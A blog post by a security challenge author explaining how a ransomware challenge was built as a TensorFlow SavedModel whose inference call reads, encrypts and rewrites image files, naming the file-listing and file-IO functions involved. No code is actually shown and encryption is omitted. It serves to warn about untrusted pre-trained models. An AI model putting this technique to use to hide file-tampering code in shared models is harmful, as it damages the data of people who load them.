Pre-trained models play important role in the progress of machine learning. Object detection models depend on pre-trained image networks. Fine-tuning of pre-trained models is often a preferred option over training models from scratch. So what if somebody could hide ransomware or some spyware—stealing your precious data—into one of these models? What if you could write ransomware directly in TensorFlow? This article will go over details of what’s possible.
This post is intended as an educational overview of the possible dangers of using pre-trained models and not as a guide for creating one.
DISCLAIMER
This year I helped prepare challenges for European Cyber Security Challenge 2021. The challenge I created is about reversing ransomware written in TensorFlow and stored as a TensorFlow model which encrypts data (in my program only images) when used for inference. This article won’t explain how to solve the challenge, but rather give some details on how it was created. In the rest of the article, I will assume using TensorFlow 2.4.1.
TensorFlow Model Formats
If we use popular tf.keras.Model
class for building a model, it provides a simple save(...)
function. This function allows saving the model in two formats:
The benefit of HDF5 is that it saves a model into a single file, but it seems to be more strict about file content. In this post, we will use Tensorflow SavedModel as it allows to save more complex functions.
Reading & Writing Files
Reading and writing are the key IO functions for creating ransomware. Storing these functions in the saved model is the most important step.
It’s not a big surprise that there are functions for reading files. After all data pipeline is an important part of every machine learning project. Therefore TensorFlow provides a lot of functions for optimizing this process. The two main packages we will use are tf.io
and tf.data
.
tf.io
provides low-level input and output operations. We will use functions tf.io.read_file(...)
and tf.io.write_file(...)
. The great thing about these functions is that they can read a file directly into tf.Tensor
or write out tf.Tensor
into file. Moreover, these functions can be saved in the SavedModel format.
However, the tricky part turns out to be listing files. Ransomware can’t depend on static file paths. Plus it must be able to list files outside of the model directory. I had to try multiple different functions because some functions return always the same result once saved. Eventually, I arrived at tf.data.Dataset.list_files(...)
which list files based on file pattern. Furthermore, this file pattern can be in form of tf.Tensor
.
Ransomware
With these key components, we can get to writing the actual code. As shown below we create the model by sub-classing tf.keras.Model
. Then we only need to overwrite the call(...)
function which is executed during prediction. There we perform actual prediction plus encryption of the files.
I skipped the actual encryption function. There are some limitations when using TensorFlow for arbitrary length arrays, but with enough creativity, this shouldn’t be a problem. Especially since the files can be loaded as a byte array.
The biggest issue is traversing the directories. As of right now, the code encrypts only images. This could obviously be extended by checking for different file types and adding ../
for accessing parent directories. However, I didn’t find any easy way of detecting if the listed file is a directory or actual file.
Another issue is that the code is actually quite slow. At least my encryption algorithm which I used for the ECSC 2021 challenge was. I guess it was mainly because I was running the encryption byte by byte which takes forever on large files. Though I wouldn’t be surprised if somebody managed to perform the encryption using optimized matrix operations.
Conclusion
I guess that in order to create successful ransomware you would need to figure out more problems than just reading files. On the other hand, it’s still concerning that model can read files without any notice. Especially since pre-trained models are a crucial part of the machine learning world.
Right now I am working on the application feltoken.ai which focuses on creating a federated learning solution using smart contracts. Preserving data privacy is a crucial part of federated learning where parties share only the final trained model between each other. The things demonstrated in this article make it impossible to use this model format for sharing models as it may lead to possible data leaks.
Leave a Reply